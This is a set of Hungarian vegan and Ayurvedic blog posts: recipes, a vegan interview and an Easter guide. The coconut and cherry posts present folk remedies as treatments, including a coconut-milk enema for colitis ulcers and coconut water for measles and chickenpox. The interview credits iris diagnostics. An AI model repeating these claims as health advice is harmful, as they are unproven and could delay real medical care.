A kókuszt szinte mindenki ismeri és a legtöbb ember szereti is. Még kicsiny hazánkban is nagyon népszerűek a kókuszos sütemények, torták és egyre elterjedtebb a kókusztej használata is. Érdemes kerülni vagy csak ritkán használni a nem friss dolgokat pl. konzerv kókusztejeket. Inkább készíts otthon frissen kókuszdióból vagy szárított minőségi kókuszreszelékből. A kókusztej receptet nemsokára fel is teszem a blogra. Egyszer az egyik guru mondta, ahol van kókuszpálma ott van minden:) Van mit enni, inni, lehet belőle házat építeni, tüzet rakni és öltözködni is tudsz. Már csak el kellene egyszer jutnom egy olyan helyre, ahol van kókuszpálma:) Én egyszerűen imádom a kókuszt, Te hogy vagy ezzel? :) A blogon jó néhány kókuszos receptet is találsz, ha beírod bal oldalt a keresőmezőbe, hogy kókusz. A kókusz hatásai és ájurvédikus alkalmazásaA kókusz édes és hűsítő az ájurvéda szempontjából. A kókusz húsa kemény, nehéz és olajos, zsíros a közepe folyékony. A kókusz belsejében lévő folyadék, a kókuszvíz. A kókusztejet pedig a friss reszelt kókuszból készítik. A reszeléket összekeverek egy csésze vízzel, hagyják állni néhány percig és utána ebből préselik ki a kókusz tejet. 10 ájurvédikus alkalmazási mód: - Viszkető ekcémára kiváló, ha pirított kókuszport teszel a bőrödre, - Leégés esetén kend be magad kókuszolajjal. - Égő vizelet esetén nagyon jó ha iszol egy csésze kókuszvizet. - A kókuszvíz nagy segítség, bárányhimlő és kanyaró esetén. - Ha a hajad vékonyodik vagy nagyon hullik, masszírozd át a fejbőrödet kókuszolajjal. - Korpásodás, fejbőrviszketés vagy pigmenthiány esetén szintén alkalmazd a kókuszolajat külsőleg az érintett területen. - Körömgombásodásnál használj kókuszolajat. - Amennyiben nagyon bő a menstruációs vérzésed, a következő recept sokat segíthet. 1 csésze kókuszvizet keverj össze fél teáskanál kandiscukorporral (sharkara cukor) vagy organikus teljes értékű nádcukorral. - Vastagbél gyulladásból származó fekély esetén alkalmazz beöntést, fél liter kókusztejjel. Ez enyhíti a tüneteket. - Ha vérzik az ínyed, készíts fogport az alábbiakból: finomra őrölt kókuszhéj egy csipet étkezési kámforral . Mindig vegyszermentes (bio) kókuszt használj! felhasznált szakirodalom: dr. Vasant Lad és Usha Lad Ájurvéda szakácskönyve
Fekete quinoa brokkolival és cukkinivel
2018. június 3. Élj harmóniában
A quinoa egy nagyon ősi dél amerikai étel. Nagyon gazdag tápanyagokban számos egészségre kedvező hatása van. Hatásairól már korábban írtam részletesen, itt olvashatod. Fekete quinoát előszór Olaszországban ettem és nagyon, nagyon ízlett, A fehér quinoához képest a fekete sokkal aromásabb, nagyon ízletes és a fekete quinoát is könnyű elkészíteni. Gluténmentes is, így gluténmentes diétában jól használható. Fekete quinoa brokkolival és cukkinivel Hozzávalók: 4* 1/3 csésze fekete quinoa só víz 1 nagy fej brokkoli 2 cukkini 2 ek. ghí 1/4 tk. római kömény 1/4 tk. őrölt koriander 1 kis darab gyömbér egy csipet kurkuma só Vegyszermentes (bio) alapanyagokat használj! A quinoat egy szűrőben, meleg vízzel mosd meg alaposan - addig amíg a víz szép áttetsző nem lesz - majd csöpögtesd le . Tegyél fel egy edényt a tűzre, majd öntsd bele a lecsöpögtetett fekete quinoat és szárazon pirítsd meg egy picit. Majd öntsd fel 3 szoros mennyiségű forró vízzel és tegyél a vízbe sót ízlés szerint. Majd forrald fel a és takarékon lefedve főzd, amíg a víz el nem párolog róla. (kb. 20-25 perc) Néha nézz rá, ha elfőtt a víz és még nem puha a quinoa akkor egy ici pici vizet tegyél hozzá. Amíg a quinoa elkészül, pucold mosd meg a cukkinit, a brokkolit szedd rózsáira és mosd meg. Egy serpenyőben tedd oda a ghít, majd ha felmelegedett tedd bele a római köményt, édesköményt, amikor picit megpirult tedd hozzá a koriandert, kurkumát, gyömbért. Add hozzá a brokkolit is és pirítsd meg kicsit. Tegyél hozzá egy csipet vizet és tegyél rá fedőt részlegesen, hogy megpuhuljon. Amikor a brokkoli kicsit kezd élénk zölddé válni, add hozzá a cukkinit is és tedd vissza a fedőt, de résnyire hagyd félrehúzva. A végén tegyél hozzásót és forgasd össze a fekete quinoával. Szedd ki tányérra, locsold meg olívaolajjal és tálalhatod is:)
A cseresznye jótékony hatásai és ájurvédikus alkalmazása
2018. május 25. Élj harmóniában
A cseresznye a kora nyár egyik kedvenc nagy gyümölcse. Már az ókorban is használták gyógyászati célokra, mert kiváló gyógyhatásokkal rendelkezik. Kedvező hatása van az emésztőszervekre, serkenti az emésztést, felfokozza a belek munkáját, megakadályozza a székrekedést. Erősíti az immunrendszert. Tisztítja a vért, így ízületi gyulladásra is nagy segítséget jelent. Széppé és egészségessé teszi a bőrt. Nagyon magas a vitamin és ásványi anyag tartalma, így hiányállapotok kezeléséhez is alkalmas (kálium, kalcium, foszfor, cink, magnézium és vas, C- és B-vitamin) Kedvezően befolyásolja a hormontermelést. Segít eltávolítani a szervezetből a fölösleges vizet, kiváló vízhajtó hatással rendelkezik A cseresznye édes, savanyú és összehúzó és pikáns gyümölcs az ájurvédában. Fűtő hatással rendelkezik. Megnyugtatja a Vata és Kapha minőségeket, de ha valaki túl sokat fogyaszt belőle emeli a Pitta-t. Néhány ájurvédikus alkalmazási mód: Mindig vegyszermentes (bio) cseresznyét fogyassz - Naponta 10-20 szem cseresznye elfogyasztása jó elmebeli fáradtság, stressz, álmatlanság és kimerültség esetén is. - PMS szindróma és túl erős menstruáció esetén (Vata és Kapha szimptómákkal kísérten - mint a fájdalom, víz visszatartás, fehérfolyás) egyél a menstruáció előtti 1 hétben naponta, üres gyomorra 10 szem cseresznyét. - Ha hosszú utazás autóval fejfájást vagy rosszullétet okoz, akkor egyél meg 7 szem cseresznyét. - Rossz látás és vörös vagy véreres szem (és orrhegy) esetén egyél 15 szem cseresznyét üres gyomorra. - Ha a bőröd nagyon száraz akkor cseresznyepépet tegyél lefekvés előtt a bőrödre 15 percig. - Ekcéma és pikkelysömör esetén sokat segíthet a porrá őrölt cseresznyemagból készült paszta. Ezt hagyd a bőrödön 10- 15 percig. felhasznált szakirodalom: dr. Vasant Lad és Usha Lad Ájurvéda szakácskönyve
Cézár saláta sült csicseriborsóval és fokhagymás krutonnal
A fejessaláta megvásárlása esetén szinte kivétel adja magát a kérdés: most azonnal dobjam ki a kukába, vagy várjak vele két hetet? Ma azonban felelősségem teljes tudatában tettem egy példányt a bevásárlókosárba, és 80%-ban fel is használtam. (A maradék sorsa azonban máris borítékolható: három hónap múlva fogalmam sem lesz, milyen gonosz létforma az ott a hűtőben, és nem kéne-e vegyvédelmi ruhás ördögűzőt hívni, mielőtt hozzáérek. Ezért állatbarát kecsketartóknak ingyen odaadom.) Na, de ha már így alakult, lássuk a kompozíciót!
Összekubikolja az alábbiakat:
1 fej római saláta 10 db koktélparadicsom A csicseriborsóhoz: 200g, azaz egy konzerv csicseriborsó 1 tk füstölt pirospaprika 1 tk fokhagymapor 1 ek olívaolaj A krutonhoz 1 kisebb bagett kiszárítva 2 gerezd fokhagyma 2 ek olívaolaj 3-4 szál petrezselyem felaprítva Az öntethez: 1 csésze kesudió beáztatva 2/3 csésze vegán majonéz (itt elpofáztam, hogyan kell házilag, tehetségtelen konyhatündérek célozzák meg az Aldit, ott van tejföl- és tojásmentes) 2/3 csésze víz 1 ek citromlé 1 ek dijoni mustár 1 kis löttyintésnyi balzsamecet 3 gerezd fokhagyma lereszelve só/bors A salátaleveleket összetépkedi, a koktélparadicsomot felvágja, ízléses tálba helyezi. Az öntet összetevőit turmixgépbe teszi, és miközben alaposan összemixeli a hozzávalókat, máris azon letargiázik, mennyire ótvar, posványos dolog turmixtartályt mosogatni. A csicseriborsóról leönti a medvenyál állagú fröttyöt, szűrőben átöblíti, papírtörlővel áttörni. Egy forró serpenyőben pár percig szárazon pirítja, majd egy löttyintésnyi olívaolajat ad hozzá. Sózza, majd ha megpirult (és csak akkor) fűszerezi és leveszi a tűzről. Ha már a bagett olyan száraz, mint egy telekszerződés (vagy olyan kemény, mint a Metallica), felkockázza. Egy kisebb tálban összekeveri az olívaolajat, a lereszelt foghagymát és a petrezselymet, majd mindezt egy forró serpenyőben a felkockázott bagetthez adja. Ha megpirult, összeforgat mindent mindennel, és önfeledten zabál.
Halva (halava) – ájurvédikus édesség
2018. április 20. Eszemiszom – Jóga Magazin
Tegnap jöttünk vissza a Tavaszi Jóga Elvonulásról. A jóga Elvonulásokon a jóga és meditációs programokon, kirándulásokon, előadásokon, pihenésen túl nagy szerepet kap a helyes táplálkozás. Mindig 100% bio alapanyagokból készült, friss, ájurvédikus menüket készítünk. A jógatáborozók, így néhány napig megtapasztalhatják az egészséges étkezés hatásait. Az elvonulások legkedveltebb desszertje a Halva. Már évek óta kéritek a receptet, most pótlom:)
A halva vagy halava egy tradicionális búzadarából készült indiai édesség, amely számos kultúrában és országban elterjedt. Általában ünnepeken, Szent napokon készítik és az Isteneknek ajánlják. Általában búzadarából, cukorból, ghíből készül különböző fűszerekkel, magvakkal és gyümölcsökkel.Nagyon sok változata van mint a mandula, kókusz, pl. egy répa halava receptet már korábban közreadtam a receptet itt olvashatod.
Ájurvédikus szempontból nagyon tápláló, melegítő, Vata kiegyenlítő étel, leginkább hűvös időjárásban, főleg télen ideális csemege. Az Ojas-t is táplálja, ami az immunrendszer és a testi-lelki harmónia alapja. A halva az édességvágyat jól kielégíti, miközben számos fontos ásványi anyag forrása, így egészséges szöveteket épít a testben.
Hozzávalók
20 dkg búzadara
3 ek ghí
10 dkg teljes értékű nádcukor
forró víz
1 db szegfűszeg
vanília, fahéj (tetszés szerint)
Vegyszermentes (bio) alapanyagokat használj!
Hevítsd fel a ghít egy magas falú edénybe, majd pirítsd aranybarnára benne a búzadarát, fűszereket és a nádcukrot állandó keverés mellett. Állandó keverés mellett öntsd fel a búzadarát négyszeres mennyiségű forróvízzel és keverd folyamatosan (kb 10 percig).
Forrón tálalva a legfinomabb:)
3 éves a blog:)
2018. április 18. Élj harmóniában
Pontosan 3 éve, 2015. április 18-án indítottam el Nektek, Értetek az Élj harmóniában blogot. Talán észrevettétek, hogy az elmúlt néhány hétben a blog külseje is megújult:) Ezt születésnapi ajándéknak szántam Nektek és remélem tetszik.:) A látogatottsági adatokból látom, hogy nagyon sokan nézitek az oldalt, olvassátok a recepteket. cikkeket életmóddal, jógával, ájuvédával, gerincterápiával, táplálkozással kapcsolatban. A blog 3 éves látogatottsága arra utal, hogy valóban volt értelme elindítani a blogot. Van haszna, hogy írom Nektek a bejegyzéseket:) Örülök, hogy a tevékenységeimmel nap mint nap hozzájárulhatok mások boldogabb, egészségesebb életének kialakításához. Te csak töretlenül fejleszd tovább a tudatosságodat, építsd be a hétköznapi életedbe az egészséges életmód alapelveit. Köszönöm, hogy az elmúlt 3 évben látogattad a blogot, rendszeresen olvastad:) Ha szeretnél Tőlem praktikus tanácsokat kapni az egészséges életmódhoz, cikkeket olvasni, programokról, tanfolyamokról információt szerezni jelezd felém, írd meg az e-mail címed a kapcsolatokhoz. Ha több friss információt szeretnél, akkor érdemes a facebook oldalamon is nyomon követned. Itt tudsz csatlakozni az oldalhoz Lelkesedéssel, szeretettel, kifogyhatatlan ötletekkel folytatom Nektek a blog írását. A tudás egy olyan dolog, amit ha megosztunk másokkal nekünk sosem lesz belőle kevesebb, viszont másoknak sokat tudunk segíteni javítani az életminőségükön. kívánok egészséget és harmóniát sok szeretettel : Kati
Epres csokoládés “sajttorta” (nyers, laktózmentes, gluténmentes, vegán)
2018. április 18. Zizi kalandjai
Hosszú időre eltűntem, mert egy vírusos felsőlégúti megbetegedés ledöntött a lábamról három hétre! Még életemben nem voltam három hétig beteg. A betegség magával hozta, hogy kevesebbet ettem, nem volt nagy étvágyam és a social mediatól is elment a kedvem. Minimálisat pötyögtem a telefonomon, néhány fontos emailre válaszoltam, de a laptopomat nem nyitottam ki. Jól esett távol lenni a... Source
Halva (halava) - ájurvédikus édesség
2018. április 9. Élj harmóniában
Tegnap jöttünk vissza a Tavaszi Jóga Elvonulásról. A jóga Elvonulásokon a jóga és meditációs programokon, kirándulásokon, előadásokon, pihenésen túl nagy szerepet kap a helyes táplálkozás. M indig 100% bio alapanyagokból készült, friss, ájurvédikus menüket készítünk. A jógatáborozók, így néhány napig megtapasztalhatják az egészséges étkezés hatásait:) Az elvonulások legkedveltebb desszertje a Halva. A halva vagy halava egy tradicionális búzadarából készült indiai édesség, amely számos kultúrában és országban elterjedt. Általában ünnepeken, Szent napokon készítik és az Isteneknek ajánlják. Általában búzadarából, cukorból, ghíből készül különböző fűszerekkel, magvakkal és gyümölcsökkel.Nagyon sok változata van mint a mandula, kókusz, pl. egy répa halava receptet már korábban közreadtam a receptet itt olvashatod. Ájurvédikus szempontból nagyon tápláló, melegítő, Vata kiegyenlítő étel, leginkább hűvös időjárásban, főleg télen ideális csemege. Az Ojas-t is táplálja, ami az immunrendszer és a testi-lelki harmónia alapja. A halva az édességvágyat jól kielégíti, miközben számos fontos ásványi anyag forrása, így egészséges szöveteket épít a testben. Hozzávalók 20 dkg búzadara 3 ek ghí 10 dkg teljes értékű nádcukor forró víz 1 db szegfűszeg vanília, fahéj (tetszés szerint) Vegyszermentes (bio) alapanyagokat használj! Hevítsd fel a ghít egy magas falú edénybe, majd pirítsd aranybarnára benne a búzadarát, fűszereket és a nádcukrot állandó keverés mellett. Állandó keverés mellett öntsd fel a búzadarát négyszeres mennyiségű forróvízzel és keverd folyamatosan (kb 10 percig). Forrón tálalva a legfinomabb:)
tésztamentes carbonara
2018. április 7. Beautilicious
Nem ismerek embert, aki ne szeretné a carbonárát, ezzel én is így vagyok, és szerintem te is, ha jól gondolom, feltétlen ki kell próbálnod ezt a receptet. :) hozzávalók - 250gr füstölt sonka - 2tojássárgja - 150gr tejszín - 1gerezd fokhagyma - 1 édesburgonya - szójaszósz - olívaolaj Így készítsd - Pirítsd le a kockára vágott sonkát - Keverd el a tejszínt a tojássárgájával, és a fokhagymával, majd add a sonkához - Reszeld le a megtisztított édesburgonyát , vagy vágd hajszáll vékonyra - Keverd el szójaszósszal, majd pirítsd le olajon
7 dolog, amit kerülj el és lelassíthatod az öregedést
2018. március 26. Élj harmóniában
A minap egy új jógás tanulóm 10 évvel fiatalabbnak nézett. Ezen jót mosolyogtam, azért ennyit nem tagadhatok le. ) Az viszont tény, ahogy idősebb korodban kinézel és amilyen az egészséged, az sokban függ attól, hogy fiatalabb korodban milyen döntéseket hozol, hogyan éled az életed. Vannak olyan rossz szokások, amik az emberek életében jelen vannak és sajnos nagymértékben gyorsítják az öregedés folyamatát. Mire kiderül, hogy kedvezőtlen ezen szokások hatása, a nem jól meghozott döntések következtében már számos öregedéssel együtt járó folyamat nem visszafordítható. Ismerd meg ezeket a kedvezőtlen szokásokat és szabadulj meg a rossz szokásaidtól, lassítsd le az öregedést:) Hozz az élet minden pillanatában olyan döntéseket, amik hosszútávon, az életedre, testi-lelki jólétedre, egészségedre jó hatással lesznek. Kerüld el az alábbi rossz szokásokat: - Dohányzás - Alkoholfogyasztás - Helytelen táplálkozás (elhízás, rendszeres diétázás, kevés zöldség és gyümölcs fogyasztás, késő esti étkezés, túl sok zsíros, cukros, húsos étel etc.) - Kevés alvás - Stressz - Düh és haragtartás - Kevés testmozgás Szeretnél életmódot váltani? Akkor lépésről, lépésre fokozatosan haladj. Kezdetben csak egy-egy dolgon próbálj változtatni és figyeld meg milyen hatással lesz az életedre ez a változás. Pl. sétálj 20 percet és figyeld meg milyen lesz utána a hangulatod vagy vacsorára nem fogyassz húsos ételt és másnap reggel figyeld meg frissebben ébredsz-e. A rossz szokásaidtól úgy tudsz legkönnyebben megszabadulni, ha helyettük új, jó szokásokat alakítasz ki. Az új szokások bevezetése általában 30-40 napot vesz igénybe. Az életmódváltásról egy korábbi cikkben már írtam részeltessen itt tudod elolvasni Fiatalos külsőt és jó egészséget kívánok Neked sok szeretettel:) Kati
Vaniliás kekszes pohárkrém "tejszínes" gyümölcsökkel
2018. március 21. Vegán receptek Tőlünk Nektek
Melindától érkezett ez a variálható recept. A fantáziádra van bízva, hogy milyen módon rétegezed a következő alapanyagokat:
- 1 csomag lidl-ben kapható vegán édes keksz
- 1 csomag vanilia pudding megfőzve, lehűtve
- 1 doboz vegán tejszínhab felverve
- szezonális gyümölcs (fagyasztott is jó)
[...] Bővebben!
Paradicsomos voroslencse leves
2018. március 19. Mindennapi ételeink
Fanni, mint a gyerekek többsége, nagyon szereti a milánói makarónit.Ezt sokszor voroslencsevel készítem (erről is írok majd). Így született meg az ötlet, hogy a voroslencse és a paradicsom parositasabol készüljön egy finom leves is. Hozzávalók: Kb.8 dl sűrített paradicsom 2 dl viz 20 dkg voroslencse 1 fej vöröshagyma 4-5 gerezd fokhagyma 3 ek.olaj majoranna, bazsalikom, római kömény, korianderlevel citrom, eritrit/nyirfacukor-izles szerint Elkészítés: A hagymát olaj és ugyanannyi víz keveréken megparoljuk. Hozzáadjuk az előzetesen atmosott voroslencset, és a fűszereket, áttört fokhagymát. Felengedjuk vízzel. Puhára főzzük a voroslencset, majd a sűrített paradicsomot is beleontjuk. Összeforraljuk, sózzuk, edesitjuk. Igény szerint botmixerezzuk. Önmagában is finom, de különböző levesbetetekkel is dusithatjuk.
Kakaós tekercs
2018. március 18. Beautilicious
Gyorsan összedobható egészséges fehérjében és rostban gazdag sütike erre a hideg tavaszi napra. hozzávalók - 150gr barna rizsliszt - 50gr kókuszliszt - 15g bambuszrost liszt - 40gr édesítőszer - 3tojás - 125gr natúr joghurt - 200ml kókusztej - 50ml kávé - 30gr kakaópor - sütőpor így készítsd - Keverd össze alaposan a hozzávalókat a kávé, és kakaó kivételével - Válaszd ketté a masszát, és a feléhez add a kakaóport, és a kávét - Nyújtsd ki a fehér részt, majd a sötétet is - Helyezd egymásra, és tekerd fel - Süsd ki 180 fokon 30perc alatt
Édesburgonyás gulyásleves
2018. március 13. Vegán muflon
A gulyásleves elfogyasztása már dögevő koromban súlyos erkölcsi dilemmát okozott. Lelki füleimmel ugyanis hallottam a népviseletbe öltözött, bajszos illető keserves üvöltését, amint épp megkísérlik forró bográcsba tuszkolni őt. Nos, a veganizált verzió hatására radikálisan csökkent a gulyásokkal szemben elkövetett atrocitások száma, és arra biztatok mindenkit, hogy ezután is hagyja békén őket a pusztában strázsálni!
Ezt elősegítendő, készítsük elő az alábbiakat:
1 fej vöröshagyma 2 gerezd fokhagyma 1 nagyobb édesburgonya 1/2 fej paradicsom 1/2 zöldpaprika 4-5 ek felkockázott szejtán (elkészítés pl. itt) 1,5-2 l zöldségleves-alaplé (ennek hiányában 1,5-2l víz és 1ek szárított zöldségkeverék) 1 ek paradicsompüré 1 ek pirospaprika (lehetőleg füstölt) 1 tk csípős fűszerpaprika 1 tk őrölt kömény 1 nagyobb sárgarépa 1 nagyobb fehérrépa só Hagyma felkockáz, olívaolajon üvegesre párol, enyhén megsózza, felaprított fokhagymát hozzápasszít, felkarikázott sárga és fehérrépa érkezik hozzá. Felkockázott paprika-paradicsom hozzáad. Ezt pár percig kevergeti közepes lángon, hozzáadja a főtt szejtánt, a paradicsompürét, a köményt, a fűszerpaprikákat, majd az egész rahedlit felönti az alaplével. Ha már majdnem forr, hozzáadja a felkockázott édesburgonyát, és puhára (ám nem lötyire) főzi. Tviszt!
Sebestyén Tibor, aki húsáru eladóból vált vegánná
Sebestyén Tibor éveket töltött egy húspult mögött, majd megismerkedett két fiatalemberrel, akiknek vegán termékeket forgalmazó cégéhez, a Biorganikhoz került, szójajoghurtok, gabonapelyhek, mézhelyettesítők és növényi sajtok közé. Tibi nem hisz a véletlenekben, szerintem ennek így kellett történnie. Mostanra 5 éve vegán, de párja, és – hazánkban valószínűleg egyedülálló módon – kollegáinak kb. 90%-a is a növényi alapú étkezésnek hódol. Eredetileg megjelent: http://veganallatvedelem.hu/husaru-eladobol-valtam-veganna/ Mióta vagy vegán és hogy lettél az? Eleinte nem az állatok, a környezetvédelem vagy vallás érdekelt, hanem csak a saját egészségem. Végigpróbáltam, hogy milyen változást tapasztalok, ha fokozatosan elhagyom az állati eredetű alapanyagokat az étrendemből. Először a tejet. Figyeltem, hogyan változik a bőröm. Eltűntek a pattanások, majd a torkomban az irritáció is. Aztán jött a hús, a tojás... Igazán vegánnak közel 5 éve mondhatom magam. Nagy változáson mentél keresztül, hiszen korábbi munkahelyeden húsokkal dolgoztál. Igen. Régebben egy miskolci bolt húspultjában dolgoztam. Nagy húsevő voltam akkoriban, és ott ragadtam 4,5 évig. Akkoriban élveztem, de aztán Pestre jöttem, elhelyezkedtem a G Roby-nál. Véletlenül kerültem a vegán termékeket forgalmazó Biorganikhoz, amikor megismertem a mostani két főnökömet, akik hozzánk hordták a boltba az árut. Bár nem hiszek a véletlenekben, inkább azt gondolom, így kellett lennie. Emlékszem, mondta a főnököm, kóstoljak meg nyugodtan bármit, de engem nem érdekelt, vittem magammal otthonról a kis epres tehéntejes joghurtomat. Aztán egy alkalommal megkóstoltam egy gyümölcsös szójajoghurtot. Onnantól váltottam át a tejtermékekről ezekre. Nekem nem kell sok a váltáshoz, ha finom és jó minőségű valami, akkor onnantól azt eszem. Amikor aztán a cégtől kiküldtek pl. a Herbaházba, mindig vettem valami újdonságot. Zabitalt, szójakockát, mindenfélét kipróbáltam. A nagy fordulat akkor történt, amikor a főnököm meghívott egy étterembe, a Rózsa utcába, ami akkor még nem Napfényes étterem volt. Rendeltem egy vegán gulyáslevest és egy rántott szejtános ételt. Finom volt, és teljesen jól laktam vele. Egy részét még haza is kellett vinnem. Utána elkezdtem otthon én is próbálkozni, elkészíteni egy töltött káposztát, rakott krumplit vagy pizzát hús nélkül. Kezdtem átállni. Közben íriszdiagnosztikán is jártam, ahova gyomorfekélyszerű tünetekkel kerültem. Nem árultam el semmit magamról előre, azt sem, hogy fáj a hasam, mégis azt mondták, fel kellene hagynom a húsevéssel. Elvégeztem az útifüves tisztítókúrát, és nem ettem húst, figyeltem a testem reakcióira. Eléggé eredményes volt. Ezután elolvastam a Tejről őszintén című könyvet, amiből rájöttem, mi történik a tejfeldolgozás során, mekkora ipar is ez, és mekkora pénz van benne. Aztán egy másik könyvben, az Egészséges életmódban olvastam a húsról, hogy egyetlen állatnak milyen hatalmas termőterület kell ahhoz, hogy a táplálásához szükséges gabona megteremjen, és még nem beszélve arról, min megy keresztül élete során. Akkor el is dőlt bennem, hogy megpróbálok hús és tej nélkül élni. Tehát az egészséged mellett a környezetvédelem és az állatok védelme is bejött a képbe? Ekkor már igen. De annak idején, amikor elkezdtem, csak az egészségem érdekelt. Az a hír járja, hogy a Biorganiknál nagyon sok vegán dolgozik. Tudatosan alakult így, vagy vonzza a cég a vegán jelentkezőket? Ha felvesznek valakit hozzánk, nem kérdezik meg, hogyan táplálkozik. Csak az embert nézik, hogy milyen. De valóban sok a vegán, közel 50 fő dolgozik a Biorganiknál, és volt, amikor a 90%-a vegán volt. Mostanában a fluktuáció következtében kb. 60%. Van olyan, aki jelentkezik nem vegánként és a cégnél vegánná válik? Meggyőződik róla, hogy ez a helyes út? Ez rólam is elmondható, és ismerek még néhány olyan kollegát, aki itt változtatott. A párom, Évi is a cégnél dolgozik már. Eleinte, amikor megismerkedtünk, kölcsönösen hatottunk egymásra az étkezésben. Aztán a Biorganikhoz került ő is. Természetgyógyász, a cég pedig szeretett volna egy saját tanácsadót, aki telefonon ad tájékoztatást a termékekről az érdeklődőknek. Ő így került hozzánk, vegánként. Mit jelent ez a vegán-nem vegán arány a munkakörülményekben? Például hol és mit esztek napközben? A csapatépítés sem ökörsütésben nyilvánul meg, gondolom. Mindenki hoz magával ételt, és azt eszi. Az évenkénti céges karácsonyi vacsorát vegán étterembe szervezzük. Mi az, ami még más? Nagyon jó fejek a főnökök. Nem volt még ilyen munkahelyem. Nyíltan lehet velük beszélni, emberségesebben kezelnek, mint ahogy máshol látom. Ez a bánásmód kapcsolatban áll szerinted a vegán életmóddal? Persze. Itt nem csak a külsőleg megnyilvánuló dolgok fontosak, hanem a lelkiség is, az, hogy mi zajlik benned. Esélyt adnak bárkinek, figyelnek, hogy hogyan változol, mit tudnál még kihozni magadból. Én is nagyon sokat fejlődtem, amióta itt dolgozom. Milyen termékeket szeretsz igazán? A növényi sajtokat, amiket akár rántani is lehet. A szójajoghurt, bulgur, quinoa, köles, a jázmin rizs is mindennapos lett az étrendemben, sörélesztő pelyhet pedig majdnem minden ételre szórok. A reggeli pelyheket is eszem, változatosan, csakúgy, mint a növényi tejeket és az édesítő szirupokat, amelyek remek alternatívái a méznek. Vannak vegán tisztítószereink is, kedvencem a fürdőszoba-tisztító, tehát nem csak az étkezésben álltam át. Az interjút készítette: Gacsó Anikó, a bebispenot.hu blog szerzője The post Sebestyén Tibor, aki húsáru eladóból vált vegánná appeared first on VegaNinja.
Vegán hús-vét – hogyan ünnepeljük a húsvétot vegánként?
Azt gondolod, hogy olyan, hagyományokra épülő ünnepek, mint a Húsvét, kimaradnak a vegánok életéből vagy hatalmas lemondással járnak? Olvasd el összeállításunkat arról, hogyan teremtünk ünnepi hangulatot úgy, hogy az az állatoknak is ünnep maradjon. Tehát a használatuk nélkül. Eredetileg megjelent: http://veganallatvedelem.hu/csaladi-husvet-vegan-modra/ Hímes tojás Manapság a locsolásért tojás helyett pénzt várnak a fiúk. Kétségtelen, hogy pénzt adni ,,vegánabb, mint tojást, de egyáltalán nem járul hozzá a hagyományőrzéshez és a húsvéti hangulathoz. Ha szeretnéd megőrizni a tojásformát, mint a Húsvét szimbólumát, számos lehetőség adódik ezt az állatok használata nélkül is megtenni. Az ajándékokban vagy a dekorációban használhatsz a tyúkoktól elvett helyett pl. hungarocellből, műanyagból, fából vagy papírból készült tojásokat is. Ételeknél csokiból vagy bármilyen növényi alapú ételből varázsolhatsz egy tojás alakú sütőforma segítségével húsvéti hangulatot. Így az ünnep atmoszférája is megmarad, és az állatokat is békén hagytuk. Tojáskeresés A tojáskeresést a gyerekek izgatottan várják, jó móka minden évben. A vegán családokban sincs ez másképp. A különbség annyi, hogy a szórakozásuk érdekében nem veszik el a tojást a tyúkoktól, hanem a fa, műanyag vagy hungarocell megfelelőjét, esetleg vegán csoki tojást rejtenek el a kertben. A gyerekek öröme ugyanakkora, és így kevesebbet ártunk. Élő nyuszi ajándékba? A nyulak ajándékozása, gyerekjátékként vásárlása nem jófejség. A nyuszi kétségkívül az egyik legaranyosabb állat, a gyerekek nagyon szeretik. Húsvét közeledtével könyörgő szemekkel kérik szüleiket, hogy vegyenek nekik egyet otthonra. A szülőknek ilyenkor döntési lehetőségük van. Az egyik, hogy beadják a derekukat, és ezzel nem csak egy állatkizsákmányoló üzletágat támogatnak, és szenvedést okoznak a cukiságnak, de a gyereküket is arra tanítják, hogy ez így rendben van. A másik, hogy kedvesen elbeszélgetnek csemetéikkel, elmesélik neki, a nyusziknak mennyivel jobb a saját családjuk és barátaik közt élni, a saját céljaikért, mint hozzánk költözni pár hétre. Ne feledd, a nyulak érző lények! Nem szabadna úgy bánnunk velük, mintha tárgyak lennének! A húsvéti nyuszi tartásával az is a gond, hogy az ünnepek elteltével a legtöbb család ráun, továbbadna rajta. A nyulak nagy része ilyenkor menhelyen, vagy még inkább a tányéron végzi. Sokan adják be az Állatkertbe is őket, ám ott sem létezik a nyuszimennyország, ahol hosszú, boldog életet élhetnek. El lehet képzelni, mi lesz a sorsuk. Locsolkodás Bizony, a locsolkodáshoz használt parfümök közt is választható vegán opció, ami nem tartalmaz állati összetevőket és olyan alapanyagot, aminek előállatása állatok szenvedésével járt, valamint nem tesztelték állatokon. Sajnos a parfümöknél nagyon elterjedtek az állatkísérletek, amelyek során a nyulak, rágcsálók iszonyú kínokat élnek át. Válassz erőszakmentes, állatkísérletektől mentes, vegán parfümöt, ezen a két weboldalon találsz listát róluk, sok közülük magyar drogériákban is kapható: http://www.cruelty-free-beauty.hu/markak/ http://lifestyleperfumes.eu/en/brands.html Tojás- és húsételek helyett A leggyakoribb kérdés a vegán Húsvéttal kapcsolatban: milyen ételek kerülnek az ünnepi asztalra? ,,Akkor tojást sem eszel? Meg sonkát sem? És körözöttet? Nem, ezeket valóban nem fogyasztjuk, mi vegánok, legalábbis a hagyományos recept szerint nem. Elkészítjük viszont finom, laktató, vegán változatukat. A Húsvét a tavasz ébredésének, az újjászületésnek, és így a friss zöldségek megjelenésének időszaka is. Az ünnepi lakomát ezekre alapozzuk, de ennél jóval színesebb a paletta. Készítünk vegán ,,tojássalátát, finom húsvéti étel még a bioboltokban kapható vegán kis-gömböc, ami búzahúsból készül, és a kötözött sonka vegán megfelelője, vagy kimérve is vehetünk vegán sonkát a 827 Kitchen nevű budapesti étteremben, elvitelre is. Ahogy mások is, mustárral, tormával és kenyérrel fogyasztjuk. Vegán pékségben (pl. FillGood) vásárolható vagy otthon készíthető kalács, kölesből készült körözöttet is eszünk, a hagyományos magyaros fűszerezéssel. Levesrajongóknak egy zöldségekben gazdag zsenge zöldborsólevest ajánlunk. Tavaszi finomság, és így nyugodtan kerülhet a húsvéti menübe is a sült spárga-újburgonya-újhagyma egytálétel. Zöld-fűszeres szójajoghurttal tálaljuk, a húsevő rokonok is imádják. A menü lezárásaként pedig az édességekről sem kell lemondanunk. Vegán torták százaiból válogathatunk, egyik finomabb, mint a másik. A húsvéti menühöz további remek ötleteket adnak Nagy Zita receptjei a https://www.zizikalandjai.com/ oldalon, vagy a VegaNinja receptek. Írta: Gacsó Anikó, a bebispenot.hu blog szerzője The post Vegán hús-vét – hogyan ünnepeljük a húsvétot vegánként? appeared first on VegaNinja.
kakaós vaníliakrémes bögrés süti
2018. március 4. Beautilicious
